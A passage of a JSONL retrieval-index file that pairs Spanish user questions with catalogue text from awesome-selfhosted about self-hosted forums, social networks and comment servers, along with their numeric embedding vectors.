0.0928, -0.05159, -0.07564, 0.04383, -0.01598, -0.03649, 0.02211, -0.00589, -0.0142, 0.02287, 0.01391, -0.0034, 0.06431, -0.04902, 0.12068, -0.01814, 0.03977, -0.1379, 0.06194, 0.03136, -0.04188, -0.02381, -0.04141, 0.08983, 0.02055, -0.02089, -0.06501, 0.0898, -0.01334, 0.07252, 0.00355, -0.00652, 0.01414, -0.06213, 0.06082, -0.10211, 0.00339, -0.0603, -0.05759, 0.08961, -0.07395, 0.04994, -0.04146, -0.0059, -0.07261, 0.02277, -0.04784, 0.07745, 0.03219, 0.02513, -0.014, 0.01602, 0.05434, 0.00017, -0.04966, -0.01388, 0.01969, -0.00612, 0.01818, -0.03353, -0.06401, 0.02104, 0.02807, -0.05824, -0.00322, 0.03723, 0.01225, 0.07307, -0.02333, -0.0454, 0.02222, 0.03092, 0.00297, 0.04732, 0.02496, 0.02581, 0.02064, 0.0465, 0.01217, 0.02644, 0.01298, 0.04229, -0.03804, 0.04325, -0.12426, 0.04666, -0.11445, 0.05991, -0.01074, -0.02946, -0.03239, 0.0728, 0.03611, -0.00064, 0.0269, 0.0274]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Isso β€” Lightweight commenting server written in Python and Javascript. It aims to be a drop-in replacement for Disqus [MIT, Python/Docker]. Lemmy β€” Link aggregator for the fediverse (alternative to Reddit) [AGPL-3.0, Docker/Rust]. Loomio β€” Collaborative decision-making tool that makes it easy for anyone to participate in decisions which affect them [AGPL-3.0, Docker]. Mastodon β€” Federated microblogging server [AGPL-3.0, Ruby]. Misago β€” Fully featured modern forum application that is fast, scalable and responsive [GPL-2.0, Docker]. Misskey β€” Decentralized app-like microblogging server/SNS for the Fediverse, using the ActivityPub protocol like GNU social and Mastodon [AGPL-3.0, Nodejs/Docker]. Movim β€” Modern, federated social network based on XMPP, with a fully featured group-chat, subscriptions and microblogging [AGPL-3.0, PHP/Docker]. MyBB β€” Free, extensible forum software package [LGPL-3.0, PHP]. NodeBB β€” Forum software built for the modern web [GPL-3.0, Nodejs/Docker].", "indexar": "que herramienta sirve para montar un foro federado como alternativa a Reddit?", "v": [-0.05756, -0.01807, -0.18773, -0.12244, -0.01887, -0.0148, -0.11796, -0.06578, -0.06649, -0.16125, -0.08554, -0.1196, -0.00469, -0.13567, 0.14386, 0.05597, 0.02785, -0.07837, 0.09102, -0.12237, 0.02819, -0.02583, 0.01422, -0.11991, 0.01069, -0.0696, 0.09949, -0.01737, -0.12436, 0.04604, 0.14371, 0.03301, 0.0168, 0.03401, -0.16586, -0.07352, 0.15676, 0.08508, -0.02073, 0.04905, -0.13358, 0.07969, -0.04184, 0.03283, -0.03233, 0.03474, -0.15555, -0.03575, 0.00752, 0.17197, 0.1197, -0.15447, -0.06856, 0.02378, 0.0005, -0.12213, 0.14132, -0.18643, -0.01235, 0.01503, -0.14453, 0.03599, -0.00313, 0.01894, -0.09245, 0.00796, -0.02209, -0.02757, -0.01899, 0.04952, -0.09464, -0.05608, -0.02968, -0.10783, -0.10361, 0.04319, 0.0621, 0.00541, -0.00577, 0.05097, 0.01895, -0.05316, 0.02606, 0.08638, -0.10154, -0.12316, 0.05975, -0.04608, 0.01115, -0.00724, -0.12721, 0.04822, 0.01608, -0.04014, 0.02119, -0.10553, 0.05064, 0.056, 0.02827, -0.01012, 0.07188, 0.02232, -0.03421, -0.00704, -0.06042, -0.03067, -0.00681, 0.00503, -0.02635, 0.02825, 0.15274, 0.05047, 0.02083, 0.08388, -0.00908, 0.01747, -0.08832, -0.02982, 0.08297, 0.01751, 0.04858, 0.09568, -0.03865, -0.03171, -0.02383, 0.03595, 0.00701, 0.02773, -0.01612, 0.00664, 0.01836, -0.07777, -0.07294, 0.00812, -0.13155, -0.01904, 0.04827, -0.01737, -0.03359, -0.04361, 0.06808, 0.02615, -0.0655, -0.20085, -0.04011, -0.01364, 0.03846, -0.07011, 0.02451, -0.00221, 0.03282, -0.02942, -0.01353, 0.04213, -0.04585, 0.0144, 0.00739, 0.03029, -0.01037, 0.05261, -0.05568, -0.10197, 0.08347, -0.06413, -0.02086, 0.05398, -0.00477, 0.00493, 0.0061, 0.0122, 0.05424, 0.0979, 0.05432, -0.01491, 0.05013, -0.00263, -0.01892, -0.03908, -0.01212, -0.01516, -0.00538, -0.02585, -0.07456, 0.02852, 0.02328, -0.00819, 0.0644, -0.03312, 0.00721, 0.05038, 0.02449, -0.02006, 0.00068, -0.01635, 0.04368, -0.01884, 0.01634, -0.03964, -0.00474, -0.03161, -0.00712, 0.02301, 0.02797, 0.0057, -0.03563, -0.02527, -0.02574, -0.02267, 0.02776, 0.02711, 0.02855, -0.01555, 0.02066, 0.01349, 0.0277, 0.00509, 0.02979, -0.02283, -0.05477, -0.05567, -0.03377, -0.00357, 0.03103, 0.00258, -0.04366, 0.06035, -0.00768, 0.02821, -0.00249, 0.01929, 0.05079, -0.06101, 0.02254, 0.03655, -0.03173, -0.02314, 0.03273, 0.0586, -0.00835, -0.02009, -0.03641, -0.00811, 0.01574, 0.02131, -0.04394, -0.03245, 0.02779, 0.00781, -0.02708, -0.04299, 0.00554, -0.01699, 0.02193, -0.04038, 0.01579, -0.02152]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Isso β€” Lightweight commenting server written in Python and Javascript. It aims to be a drop-in replacement for Disqus [MIT, Python/Docker]. Lemmy β€” Link aggregator for the fediverse (alternative to Reddit) [AGPL-3.0, Docker/Rust]. Loomio β€” Collaborative decision-making tool that makes it easy for anyone to participate in decisions which affect them [AGPL-3.0, Docker]. Mastodon β€” Federated microblogging server [AGPL-3.0, Ruby]. Misago β€” Fully featured modern forum application that is fast, scalable and responsive [GPL-2.0, Docker]. Misskey β€” Decentralized app-like microblogging server/SNS for the Fediverse, using the ActivityPub protocol like GNU social and Mastodon [AGPL-3.0, Nodejs/Docker]. Movim β€” Modern, federated social network based on XMPP, with a fully featured group-chat, subscriptions and microblogging [AGPL-3.0, PHP/Docker]. MyBB β€” Free, extensible forum software package [LGPL-3.0, PHP]. NodeBB β€” Forum software built for the modern web [GPL-3.0, Nodejs/Docker].", "indexar": "existe algΓΊn servidor ligero de comentarios que funcione sin base de datos compleja?", "v": [-0.03386, 0.12473, -0.21833, -0.03835, -0.00845, -0.20236, 0.02378, -0.08387, -0.1251, -0.05539, -0.00713, -0.12643, 0.00845, -0.06568, 0.2074, -0.03576, 0.14639, -0.10534, -0.02672, -0.08049, -0.03106, -0.02155, 0.03421, -0.03416, -0.13298, -0.05159, 0.06174, -0.08871, -0.1126, 0.02215, 0.01601, -0.0184, 0.04481, 0.01033, 0.0565, 0.00915, -0.08879, 0.10683, -0.05776, 0.02933, 0.12122, -0.02933, -0.07879, 0.09464, -0.05686, -0.00112, -0.0236, -0.02784, 0.10186, 0.01274, -0.08097, -0.01016, -0.10103, -0.06987, -0.09539, 0.00246, 0.09596, -0.10159, 0.17447, 0.03594, -0.10737, 0.05455, 0.00871, -0.09059, 0.03663, 0.0069, 0.0563, -0.1268, 0.02442, 0.02806, -0.03425, 0.12435, -0.063, -0.07592, 0.05673, 0.01149, 0.06468, -0.02043, -0.03356, 0.12423, 0.01926, 0.00125, -0.04576, 0.06196, -0.12068, -0.08774, 0.07276, -0.04904, 0.02142, 0.01177, 0.11057, 0.06345, -0.08538, 0.10069, 0.05208, 0.04859, 0.02101, -0.0408, 0.05426, 0.02339, 0.10157, 0.12466, -0.00721, 0.04237, 0.05763, 0.1394, 0.16868, -0.05973, 0.0325, -0.03196, 0.03959, -0.05955, -0.05176, -0.05559, -0.04664, -0.05497, -0.07389, 0.00727, -0.00688, 0.02629, -0.04792, 0.00477, 0.0601, -0.00131, -0.00695, -0.04602, -0.01567, 0.05136, 0.04069, 0.00848, -0.00309, -0.02312, -0.06019, 0.03318, 0.03697, 0.09968, 0.02639, -0.00759, -0.05591, -0.05429, 0.05, 0.07579, -0.07052, 0.02819, 0.05935, 0.02235, 0.09649, 0.02402, -0.10359, 0.00483, 0.01182, -0.02999, 0.00193, 0.0603, -0.10738, 0.02114, 0.07204, -0.05662, -0.04696, 0.04528, 0.01509, 0.06143, 0.00162, 0.06917, -0.00844, -0.03207, -0.01296, 0.01768, 0.05272, 0.04619, -0.09914, 0.02948, -0.01143, -0.09975, 0.06218, 0.00237, -0.13718, -0.07191, 0.02313, 0.0223, 0.01638, -0.00018, -0.02468, 0.01113, -0.01337, 0.01701, -0.00115, -0.0289, -0.0435, -0.037, 0.06827, 0.03496, -0.02896, 0.02946, 0.04499, -0.06514, -0.01843, -0.07609, 0.0312, -0.03712, -0.06221, 0.01974, 0.00146, 0.00433, -0.03046, 0.00645, -0.01726, -0.00215, 0.03667, -0.00546, -0.00807, -0.03435, 0.05792, -0.02492, 0.01061, -0.00198, 0.06019, -0.04722, 0.0112, -0.02686, -0.05015, 0.05487, 0.0319, 0.03503, 0.00095, 0.03492, 0.01595, 0.00313, 0.09042, -0.00729, -0.0388, 0.00467, -0.0121, -0.03913, -0.00726, -0.01974, -0.00694, -0.02789, -0.03385, -0.07102, 0.03112, 0.07303, -0.00237, -0.07824, -0.0229, -0.05647, -0.03365, 0.01782, -0.02906, -0.06037, 0.03153, -0.06322, 0.00462, -0.02124, 0.00363, -0.02451]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Isso β€” Lightweight commenting server written in Python and Javascript. It aims to be a drop-in replacement for Disqus [MIT, Python/Docker]. Lemmy β€” Link aggregator for the fediverse (alternative to Reddit) [AGPL-3.0, Docker/Rust]. Loomio β€” Collaborative decision-making tool that makes it easy for anyone to participate in decisions which affect them [AGPL-3.0, Docker]. Mastodon β€” Federated microblogging server [AGPL-3.0, Ruby]. Misago β€” Fully featured modern forum application that is fast, scalable and responsive [GPL-2.0, Docker]. Misskey β€” Decentralized app-like microblogging server/SNS for the Fediverse, using the ActivityPub protocol like GNU social and Mastodon [AGPL-3.0, Nodejs/Docker]. Movim β€” Modern, federated social network based on XMPP, with a fully featured group-chat, subscriptions and microblogging [AGPL-3.0, PHP/Docker]. MyBB β€” Free, extensible forum software package [LGPL-3.0, PHP]. NodeBB β€” Forum software built for the modern web [GPL-3.0, Nodejs/Docker].", "indexar": "con quΓ© programa puedo gestionar decisiones colaborativas en grupo fΓ‘cilmente?", "v": [0.05054, 0.13948, -0.12871, -0.1541, 0.07509, -0.09782, 0.06335, 0.01661, -0.10573, -0.16333, 0.01642, -0.00316, 0.00833, -0.02407, 0.08645, 0.05281, 0.13055, -0.06239, -0.0527, -0.01529, -0.02326, -0.0267, 0.03967, -0.04349, 0.06699, -0.06825, 0.02016, -0.06142, 0.08422, 0.04256, 0.03878, -0.02083, 0.02438, -0.12252, 0.06107, 0.07146, -0.0658, 0.03929, 0.09477, -0.01996, -0.16714, -0.02776, -0.15396, -0.03916, 0.17613, 0.00168, -0.04244, -0.05132, -0.04333, -0.02301, -0.03154, -0.02026, 0.00371, -0.05438, 0.05044, -0.02836, 0.0271, -0.14938, -0.0789, -0.03012, -0.11536, 0.03129, -0.00139, 0.02551, 0.02243, 0.07102, 0.09301, -0.02207, -0.04077, 0.1336, -0.00309, -0.00957, 0.04599, -0.04689, 0.06826, -0.00561, 0.10627, 0.07138, 0.03657, -0.04286, 0.18791, -0.00074, 0.07877, 0.03605, 0.00537, -0.0667, 0.02216, -0.04257, 0.01612, -0.01475, -0.05842, -0.08292, 0.00277, -0.03724, 0.04962, 0.02109, 0.08353, 0.0909, 0.00672, 0.04386, -0.00159, -0.04605, -0.11904, 0.06681, -0.09512, 0.16214, -0.05091, 0.02668, -0.06937, -0.02827, 0.03986, 0.04445, 0.00637, -0.04983, 0.02313, 0.01591, 0.02033, 0.03146, 0.0101, -0.05403, -0.03809, -0.03884, -0.00214, -0.06841, 0.15359, -0.01362, 0.06004, 0.1317, 0.00244, 0.04565, -0.08856, 0.06328, 0.02761, 0.02597, -0.06274, -0.02822, -0.02131, 0.03918, 0.03286, -0.13672, -0.05673, 0.03554, 0.0434, -0.04374, 0.07124, -0.13748, 0.00234, -0.00258, 0.12248, 0.11949, 0.05942, -0.01411, -0.08308, 0.06579, -0.07938, 0.02619, -0.0168, -0.03968, -0.06465, 0.01583, -0.06013, -0.02645, -0.02913, 0.02225, 0.00735, -0.05465, 0.00321, 0.03782, 0.03016, 0.09506, -0.00741, 0.01555, 0.05426, -0.06373, 0.04051, -0.07837, -0.07227, -0.06176, 0.06285, -0.00687, -0.03417, 0.03402, 0.05417, 0.01915, 0.02319, 0.01685, -0.06338, 0.13113, 0.01488, 0.02376, -0.01858, 0.06977, -0.00233, -0.0381, 0.02041, -0.04716, 0.05706, -0.02552, -0.02172, -0.02694, 0.0074, 0.01194, 0.05139, 0.04021, -0.00081, 0.06151, -0.04195, 0.11059, 0.12378, 0.11164, 0.00353, -0.01277, 0.06455, 0.02142, -0.09613, -0.00251, -0.03695, 0.03144, -0.005, 0.08293, -0.01607, -0.01539, 0.10469, 0.01301, 0.06588, 0.02164, 0.05113, 0.06008, 0.00184, 0.00263, 0.00398, -0.0423, -0.01214, -0.01253, 0.0483, -0.01553, 0.04923, -0.0193, -0.02059, -0.00388, 0.03967, 0.0433, -0.01915, -0.04474, -0.00547, -0.0608, -0.07812, 0.04206, -0.02967, -0.01771, -0.05122, 0.03327, 0.00335, -0.04917, 0.08083, 0.02468]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: OSSN β€” Social networking software that allows you to make a social networking website and helps your members build social relationships, with people who share similar professional or personal interests [CAL-1.0, PHP]. phpBB β€” Flat-forum bulletin board software solution that can be used to stay in touch with a group of people or can power your entire website [GPL-2.0, PHP]. PieFed β€” A link aggregator / reddit clone for the fediverse (alternative to Reddit) [AGPL-3.0, Python/Docker]. PixelFed β€” Ethical photo sharing platform, powered by ActivityPub federation (alternative to Instagram) [AGPL-3.0, PHP]. Pleroma β€” Federated microblogging server, Mastodon, GNU social, & ActivityPub compatible [AGPL-3.0, Elixir]. qpixel β€” Q&A-based community knowledge-sharing software [AGPL-3.0, Ruby]. Redlib β€” An alternative private front-end to Reddit, with its origins in Libreddit [⚠, AGPL-3.0, Rust].", "indexar": "que programa es para montar una red social de intereses profesionales o personales?", "v": [0.02123, 0.05582, -0.04368, -0.2839, -0.06656, -0.10172, -0.0074, -0.10653, -0.1356, -0.14411, 0.02605, -0.01653, 0.12052, -0.18406, 0.07075, 0.00774, 0.04305, -0.02895, 0.16008, 0.06031, -0.05266, -0.04198, -0.07149, -0.06285, 0.03018, 0.03042, 0.05237, -0.12524, -0.00591, 0.13608, 0.03958, 0.00341, -0.01805, -0.05588, 0.00551, 0.02475, 0.04067, -0.07488, -0.00078, 0.01754, 0.02054, -0.0896, 0.036, 0.05784, 0.08385, 0.13483, -0.08707, -0.02539, -0.01067, 0.04713, 0.03514, 0.00227, 0.0051, -0.06602, 0.01333, -0.1332, -0.07493, -0.05882, -0.15225, 0.0377, 0.02315, 0.12466, -0.0565, 0.17074, 0.0501, -0.02339, 0.10097, 0.07398, -0.04513, 0.00138, -0.02851, -0.07001, -0.05964, 0.02043, 0.02617, 0.05772, 0.0303, 0.06581, -0.00015, -0.01237, -0.07165, 0.05224, -0.01713, 0.12673, -0.00186, 0.00852, 0.05177, -0.0883, 0.00193, -0.02883, 0.09232, 0.03819, 0.00544, -0.07305, -0.02484, -0.04402, 0.12515, 0.06094, -0.02218, -0.01436, -0.03986, -0.03447, -0.07853, 0.02405, -0.02943, 0.01511, 0.03226, -0.00997, 0.04632, 0.05553, -0.01092, 0.03387, -0.02166, 0.03532, -0.04749, -0.05396, -0.07317, 0.08002, 0.03899, -0.05002, -0.05087, 0.04423, 0.0191, -0.03446, 0.10016, -0.01836, -0.00601, 0.11249, -0.10472, 0.10776, -0.05364, 0.03548, -0.06506, -0.06204, -0.06338, -0.03553, -0.07438, -0.10543, -0.0166, -0.08935, 0.01187, 0.02761, -0.07467, -0.11748, 0.00812, 0.03418, -0.01065, -0.15266, 0.07407, 0.06603, 0.01315, 0.11008, 0.01317, 0.02399, -0.07696, 0.00946, -0.00761, 0.0562, 0.01978, 0.07492, 0.02354, -0.02174, -0.00494, -0.07327, 0.0512, 0.02353, 0.0338, 0.04841, 0.14395, 0.03119, -0.02899, 0.02027, 0.01285, -0.0437, 0.06492, 0.00379, -0.02907, -0.08855, 0.05071, 0.00225, -0.08676, 0.01466, 0.10082, -0.01463, 0.00592, -0.0474, -0.09423, 0.03011, -0.00334, -0.02611, -0.10018, -0.11482, 0.01299, 0.06161, 0.08179, 0.01173, -0.00526, 0.02756, 0.03746, -0.0357, -0.0123, 0.01894, -0.03308, 0.0806, -0.01322, 0.03175, 0.0349, -0.01039, 0.0245, 0.10852, -0.01884, -0.05127, 0.00605, -0.00013, 0.01237, -0.00951, 0.03937, 0.01681, 0.06514, 0.05771, 0.01545, -0.0176, 0.0359, 0.07502, -0.03346, -0.04854, -0.00324, 0.03426, 0.02213, -0.02228, 0.03602, -0.06006, -0.01929, 0.01765, 0.05591, -0.00443, 0.0477, 0.03833, 0.00352, -0.05347, 0.01158, 0.07124, 0.04564, -0.04241, -0.02373, 0.00945, -0.05003, 0.04179, 0.06581, -0.02585, -0.04269, 0.0411, -0.02704, -0.0069, 0.01079, 0.03223]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: OSSN β€” Social networking software that allows you to make a social networking website and helps your members build social relationships, with people who share similar professional or personal interests [CAL-1.0, PHP]. phpBB β€” Flat-forum bulletin board software solution that can be used to stay in touch with a group of people or can power your entire website [GPL-2.0, PHP]. PieFed β€” A link aggregator / reddit clone for the fediverse (alternative to Reddit) [AGPL-3.0, Python/Docker]. PixelFed β€” Ethical photo sharing platform, powered by ActivityPub federation (alternative to Instagram) [AGPL-3.0, PHP]. Pleroma β€” Federated microblogging server, Mastodon, GNU social, & ActivityPub compatible [AGPL-3.0, Elixir]. qpixel β€” Q&A-based community knowledge-sharing software [AGPL-3.0, Ruby]. Redlib β€” An alternative private front-end to Reddit, with its origins in Libreddit [⚠, AGPL-3.0, Rust].", "indexar": "con que puedo crear un foro o tablΓ³n de anuncios digital?", "v": [0.13288, 0.04866, -0.03369, -0.00576, 0.07159, -0.12059, 0.00846, -0.05683, -0.09842, -0.0567, -0.03356, -0.22539, 0.01236, -0.11612, -0.05855, 0.00829, 0.06226, -0.15361, 0.02734, -0.07009, 0.10475, 0.00938, -0.03163, -0.11197, 0.08485, -0.17616, -0.02432, -0.06536, -0.1144, 0.09036, 0.09277, -0.05731, -0.00649, -0.02361, -0.01057, -0.06933, 0.11186, 0.12589, 0.05157, 0.01705, -0.03539, 0.09954, -0.10269, 0.08558, -0.02206, 0.04847, 0.0579, 0.01762, -0.05109, 0.02584, -0.00599, -0.11751, -0.07781, 0.05291, 0.02642, -0.17101, 0.07015, -0.05081, 0.10949, -0.05144, -0.00712, -0.01548, 0.02528, -0.02686, 0.03245, 0.14118, 0.07209, 0.07973, -0.10092, 0.05048, 0.0071, -0.09956, 0.02711, -0.05518, 0.13027, 0.08566, 0.03344, -0.05445, 0.00454, -0.08628, 0.0322, -0.07001, 0.00874, 0.07427, -0.08167, -0.06791, -0.09171, -0.00424, -0.10437, -0.02759, 0.02148, 0.01621, 0.04785, -0.08529, 0.05452, -0.05619, -0.00134, 0.03696, -0.13575, 0.09603, 0.02476, 0.08346, -0.05066, 0.04593, -0.09876, -0.08188, -0.0275, -0.09576, -2e-05, 0.01379, 0.01669, -0.04312, 0.01972, -0.04306, -0.01507, 0.12242, -0.00321, 0.06448, 0.08019, 0.02051, 0.12037, -0.03101, -0.03713, 0.09856, -0.02791, 0.05506, 0.02012, 0.00243, -0.05924, 0.0382, 0.04593, -0.03201, 0.02299, -0.02241, 0.00071, 0.08721, -0.01176, 0.09227, 0.00947, -0.02283, 0.0601, -0.00762, -0.06909, -0.17311, -0.04348, -0.08114, -0.0233, -0.02678, -0.0379, 0.05118, 0.01457, -0.02276, 0.05348, 0.02553, -0.03862, 0.04068, 0.01738, -0.04208, -0.02016, 0.00286, -0.07856, 0.03527, 0.00869, 0.02303, 0.02153, 0.02049, -0.06756, 0.06308, 0.02348, -0.01647, -0.0789, 0.01555, 0.06992, -0.12923, 0.12814, 0.03164, -0.04297, -0.0172, -0.06629, -0.0099, -0.06252, -0.07903, -0.08718, 0.04436, -0.01814, -0.02786, 0.03942, -0.01803, 0.05507, 0.06231, 0.01667, -0.02508, -0.05667, 0.07822, 0.04441, -0.08547, 0.01644, -0.00526, -0.01456, -0.0881, -0.00979, 0.00903, -0.02942, -0.03581, -0.00997, 0.01007, -0.01901, 0.0224, 0.04467, 0.01572, 0.07047, -0.0844, -0.00016, -0.021, -0.05104, -0.01724, 0.05156, -0.039, 0.0182, -0.01296, 0.06836, 0.00066, -0.02921, -0.00908, 0.00431, 0.082, 0.00876, 0.01049, -0.02369, 0.03844, 0.00985, -0.01833, 0.02865, -0.03725, -0.01832, 0.09509, 0.0075, -0.00251, -0.07883, 0.00771, -0.08599, 0.01334, -0.0145, 0.04335, -0.01159, -0.0786, -0.02138, 0.00492, -0.07506, -0.06897, 0.01356, 0.01263, 0.02774, -0.02369, 0.00766, 0.03614]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: OSSN β€” Social networking software that allows you to make a social networking website and helps your members build social relationships, with people who share similar professional or personal interests [CAL-1.0, PHP]. phpBB β€” Flat-forum bulletin board software solution that can be used to stay in touch with a group of people or can power your entire website [GPL-2.0, PHP]. PieFed β€” A link aggregator / reddit clone for the fediverse (alternative to Reddit) [AGPL-3.0, Python/Docker]. PixelFed β€” Ethical photo sharing platform, powered by ActivityPub federation (alternative to Instagram) [AGPL-3.0, PHP]. Pleroma β€” Federated microblogging server, Mastodon, GNU social, & ActivityPub compatible [AGPL-3.0, Elixir]. qpixel β€” Q&A-based community knowledge-sharing software [AGPL-3.0, Ruby]. Redlib β€” An alternative private front-end to Reddit, with its origins in Libreddit [⚠, AGPL-3.0, Rust].", "indexar": "cual sirve para compartir fotos Γ©ticamente como alternativa a Instagram?", "v": [-0.12001, 0.10952, -0.03609, -0.04259, 0.09121, -0.1801, -0.10724, -0.11958, -0.04641, -0.07196, -0.01641, -0.16847, 0.01377, 0.0348, 0.0612, -0.00397, 0.03372, -0.02206, 0.12067, -0.0602, -0.02161, 0.05435, -0.13286, -0.20704, 0.03381, -0.07416, -0.05857, 0.05674, -0.13371, -0.02052, 0.01463, -0.14105, 0.018, -0.03691, -0.12022, -0.12942, 0.05199, -0.0113, -0.04826, 0.0013, 0.0651, -0.00958, -0.01073, 0.04072, -0.03837, 0.09231, -0.12454, 0.02525, -0.12516, 0.02679, -0.04496, 0.041, 0.04155, 0.11911, -0.04396, -0.02045, 0.09585, -0.14492, -0.07612, 0.04618, -0.05487, 0.07364, -0.06629, 0.07672, 0.04487, -0.01556, -0.16794, 0.02965, -0.07695, 0.02091, 0.10314, 0.1208, 0.04238, -0.1159, -0.04372, 0.09353, 0.0169, -0.04761, -0.04809, 0.01477, 0.03417, -0.00352, 0.02182, 0.06609, -0.12934, -0.03701, 0.05894, -0.08304, 0.02238, -0.00248, 0.00683, -0.00409, 0.03723, -0.02963, -0.01563, 0.04445, -0.03529, 0.03458, 0.05517, -0.02409, 0.06571, -0.05797, -0.01409, -0.04312, -0.12767, -0.01957, 0.04996, -0.03182, -0.1035, -0.09603, 0.06271, -0.02553, 0.02113, 0.04472, -0.00529, 0.01881, -0.04905, -0.07119, -0.00582, -0.03955, -0.01667, 0.03834, 0.00778, -0.05768, 0.08586, 0.09699, -0.10139, 0.01709, -0.0156, 0.05991, -0.08993, -0.01486, 0.05579, -0.02849, -0.05353, -0.0329, 0.06444, -0.04636, -0.09572, -0.08747, -0.01518, -0.02093, -0.02541, -0.18672, -0.03468, 0.01894, 0.0269, -0.12983, -0.02103, 0.02815, -0.07399, 0.07361, 0.00781, 0.04242, -0.03916, 0.02668, -0.07313, -0.10615, -0.05181, 0.01928, -0.06643, -0.00883, 0.06314, 0.04297, -0.00662, -0.03155, -0.02092, -0.11272, 0.01321, -0.00735, -0.0228, 0.02953, -0.02636, -0.03723, 0.03344, 0.02477, -0.02603, -0.10201, 0.07415, 0.05958, -0.04236, 0.0266, -0.02193, 0.07396, 0.06669, 0.0021, -0.00647, 0.09341, -0.05119, 0.05082, -0.00644, -0.04644, 0.00059, 0.01897, 0.06259, -0.00644, -0.03772, -0.02535, 0.09287, -0.01234, -0.01315, -0.04535, -0.02402, 0.03307, 0.00792, -0.03455, -0.01617, 0.04558, -0.01853, -0.04246, -0.0335, -0.00629, 0.07543, -0.00441, -0.06618, -0.00207, 0.06638, -0.04022, -0.02628, 0.00125, 0.03419, 0.03074, 0.02447, 0.01445, 0.03343, 0.07356, -0.01145, -0.0198, -0.00804, -0.02, -0.00568, 0.06342, -0.01371, 0.00953, 0.04289, -0.01118, 0.00161, 0.00235, -0.00052, -0.06387, 0.07549, 0.00987, 0.0155, 0.00038, -0.04442, 0.01075, -0.10257, 0.02791, 0.01863, -0.14485, 0.0237, 0.01451, 0.03207, 0.00699, 0.05256, -0.03254]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: remark42 β€” Lightweight and simple comment engine, which doesn't spy on users. It can be embedded into blogs, articles or any other place where readers add comments [MIT, Docker/Go]. Scoold β€” Stack Overflow in a JAR. An enterprise-ready Q&A platform with full-text search, SAML, LDAP integration and social login support [Apache-2.0, Java/Docker/K8S]. Simple Machines Forum β€” Free, professional grade software package that allows you to set up your own online community within minutes [BSD-3-Clause, PHP]. Socialhome β€” Federated and decentralized profile builder and social network engine [AGPL-3.0, Docker/Python]. Talkyard β€” Create a community, where your users can suggest ideas and get questions answered. And have friendly open-ended discussions and chat (Slack/StackOverflow/Discourse/Reddit/Disqus hybrid) [AGPL-3.0, Docker/Scala]. yarn.social β€” Self-Hosted, Twitterβ„’-like Decentralised micro-logging platform. No ads, no tracking, your content, your data [MIT, Go].", "indexar": "que alternativa a reddit sirve para crear mi propio foro?", "v": [-0.04061, 0.10574, -0.18517, -0.03282, 0.05492, -0.08021, -0.06321, -0.07481, -0.06892, -0.15596, 0.00825, -0.19543, 0.12113, -0.10533, 0.07001, -0.04109, 0.06277, -0.07548, 0.15328, -0.03034, -0.00604, 0.04049, 2e-05, -0.11575, -0.00375, -0.17621, 0.10883, -0.05947, -0.06103, 0.06794, 0.08839, 0.08329, 0.08296, 0.01401, -0.11462, -0.07504, 0.18282, 0.08225, -0.00298, 0.04672, -0.06402, 0.08814, -0.03268, 0.12594, -0.03628, -0.00144, -0.07141, -0.04188, -0.10535, 0.15902, 0.04482, -0.1262, -0.07421, 0.04959, 0.08472, -0.10378, 0.08814, -0.2117, 0.00815, 0.00551, -0.14352, -0.0461, 0.08416, -0.00713, -0.02202, -0.03549, -0.01394, 0.01435, -0.04277, 0.04347, -0.16304, -0.06559, -0.02821, -0.16422, 0.02462, 0.03664, 0.04228, -0.02883, -0.03376, -0.00736, 0.01026, -0.08356, 0.00708, -0.00706, -0.04604, -0.07763, -0.02686, -0.03035, 0.02754, 0.00912, -0.06641, -0.00584, 0.03679, -0.00311, -0.00531, -0.05941, 0.03618, 0.06678, -0.00462, 0.04203, 0.04749, -0.04377, -0.02443, -0.02581, -0.02953, -0.04219, 0.05158, -0.03248, -0.008, 0.047, 0.07619, 0.02337, 0.04399, -0.00635, 0.03545, 0.02013, -0.0632, 0.03599, 0.01578, 0.10774, -0.0024, -0.00217, -0.06089, -0.05192, -0.04988, 0.0167, -0.00641, -0.02224, 0.00715, 0.10335, -0.00926, -0.07344, -0.01624, -0.07914, -0.08617, 0.01866, 0.05433, 0.01451, -0.01466, -0.04382, 0.0717, 0.07412, -0.08985, -0.17076, -0.05728, -0.04121, 0.00355, -0.06848, 0.05176, 0.00713, -0.03964, -0.04304, -0.01354, 0.05594, 